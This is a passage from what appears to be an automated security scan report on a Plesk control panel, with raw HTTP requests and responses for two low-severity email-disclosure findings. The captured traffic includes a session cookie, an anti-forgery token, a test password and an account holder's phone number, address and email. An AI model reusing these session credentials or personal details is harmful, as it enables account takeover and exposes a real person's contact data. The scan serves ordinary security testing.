<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The following email address was disclosed in the response:

Request

POST /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/create
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 434

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=format-1&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=thepassword&general%5Baccount%5D%5BpasswordConfirmation%5D=thepassword&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:24:08 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:24:07 GMT
Connection: close
Content-Length: 204

{"formMessages":{"general":{"vcard":{"email":{"internalEmail":{"recordFound":"The e-mail address format-1@nosedivesailing.com already belongs to another user."}}}}},"status":"success","statusMessages":[]}

11.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/2

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:34 GMT
Connection: close
Content-Length: 45694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Hoyt LLC Research - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F2' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>Hoyt LLC Research</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId" disabled="1">
<option value="5" label="Owner" selected="selected">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" disabled="disabled" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
